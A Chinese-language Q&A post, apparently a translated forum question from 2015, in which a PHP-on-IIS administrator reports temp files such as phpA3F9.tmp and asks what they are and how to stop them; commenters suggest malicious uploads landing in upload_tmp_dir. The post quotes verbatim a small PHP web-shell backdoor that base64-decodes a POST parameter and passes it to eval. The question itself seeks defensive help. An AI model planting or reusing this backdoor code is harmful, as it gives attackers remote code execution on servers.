【发布时间】:2015-12-01 14:35:52
【问题描述】:
我注意到我们的临时目录有一些看起来像临时文件的名称,例如 phpA3F9.tmp
查看内容我发现一个数字后跟一些PHP代码,以下代码出现在几个文件中
9990000
<?php
$mujj = $_POST['z']; if ($mujj!="") { $xsser=base64_decode($_POST['z0']); @eval("\$safedg = $xsser;"); } ?>
这似乎是一次攻击尝试,但我认为它依赖于攻击者能够执行 tmp 文件夹中的代码。
谁能解释这里发生了什么?有哪些风险?这些文件如何进入 tmp 文件夹?我该如何阻止他们?
我不知道这是否相关,但我们在 IIS 上运行 PHP 5.5
【问题讨论】:
-
那个文件名让我想起了 MSIE 临时文件
-
可能它们是被攻击者上传到服务器的,如果您的
upload_tmp_dir指向您的临时目录,则似乎有人试图将恶意代码上传到您的服务器。这些文件在脚本执行后被删除。